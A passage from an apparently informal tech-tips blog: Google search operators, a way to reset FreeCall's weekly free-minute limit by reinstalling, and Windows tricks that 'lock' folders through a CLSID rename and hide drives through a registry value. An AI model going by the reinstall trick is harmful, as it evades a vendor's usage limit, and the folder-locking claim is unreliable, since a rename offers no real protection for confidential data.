5. Specific Document Types: If you’re looking to find results that are of a specific type, you can use the modifier "filetype:". For example, you might want to find only PowerPoint presentations related to internet marketing.
Example: "internet marketing" filetype:ppt
6. This OR That: By default, when you do a search, Google will include all the terms specified in the search. If you are looking for any one of one or more terms to match, then you can use the OR operator. (Note: The OR has to be capitalized).
Example: internet marketing OR advertising
7. Phone Listing: Let’s say someone calls you on your mobile number and you don’t know how it is. If all you have is a phone number, you can look it up on Google using the phonebook feature.
Example: phonebook:617-555-1212 (note: the provided number does not work – you’ll have to use a real number to get any results).
8. Area Code Lookup: If all you need to do is to look-up the area code for a phone number, just enter the 3-digit area code and Google will tell you where it’s from.
Example: 617
9. Numeric Ranges: This is a rarely used, but highly useful tip. Let’s say you want to find results that contain any of a range of numbers. You can do this by using the X..Y modifier (in case this is hard to read, what’s between the X and Y are two periods. This type of search is useful for years (as shown below), prices or anywhere where you want to provide a series of numbers.
Example: president 1940..1950
10. Stock (Ticker Symbol): Just enter a valid ticker symbol as your search term and Google will give you the current financials and a quick thumb-nail chart for the stock.
Example: GOOG
11. Calculator: The next time you need to do a quick calculation, instead of bringing up the Calculator applet, you can just type your expression in to Google.
Example: 48512 * 1.02
12. Word Definitions: If you need to quickly look up the definition of a word or phrase, simply use the "define:" command.
Example: define:plethora
Hope this proves useful in your future Google searches. If there are any of your favorite Google power tips that I’ve missed, please feel free to share them in the comments.

Make free CALLS from computer on Telephone (100 % free)

Using this VOIP program, you can call landline numbers in any country for FREE. FreeCall is still a Freeware app but you only get 300 minutes a week.To bypass this restriction:Keep the setup.exe. Freecall’s protection system is quite flawed, when the program announces you cannot use any more minutes = Uninstall and reinstall and it will reset your 300 minutes which only takes a moment.

A)You MUST make an account with the program when it loads up. Then when your logged in (it will say at the bottom: ‘The client is logged on

B)Go to the dial pad TAB, ignore the on screen buttons, at the bottom type in your number and remember you need to add country codes at the beginning - NO spaces in the number either.

C) And it does do all countries for free - i’ve used it from NZ to england, USA, Spain and Aussie and they used it back.

D) If it didn’t work, you need to check your firewall settings etc, this is an obvious but a program like this needs full access.

Lock Your Drives and Folders Using Registry

There are plenty of software which locks drives and folder to protect your confidential data. Why waste money on such tools when you can do it with a simple registry tweak? Here’s how:
Caution: Before you attempt these tweaks, please make sure that you have a backup of your registry, just incase something goes wrong in the middle.

Locking Folders:

Consider you want to lock a folder named XXXX in your E:\, whose path is E:\XXXX.
Now open the Notepad and type the following

ren xxxx xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D}

Where xxxx is your folder name. Save the text file as loc.bat in the same drive.
Open another new notepad text file and type the following

ren xxxx.{21EC2020-3AEA-1069-A2DD-08002B30309D} xxxx

Save the text file as key.bat in the same drive.

Steps to lock the folder:

To lock the xxxx folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.

Locking Drives:

We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.

1. Start & Run and type Regedit to open Registry editor
2. Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Create a new DWORD value NoViewOnDrive and set its value as

2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 - 26

For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)

4. To lock more drives, calculate the value of each drive and then set sum of those numbers as value .

5. To unlock your drive just delete the key from the registry.
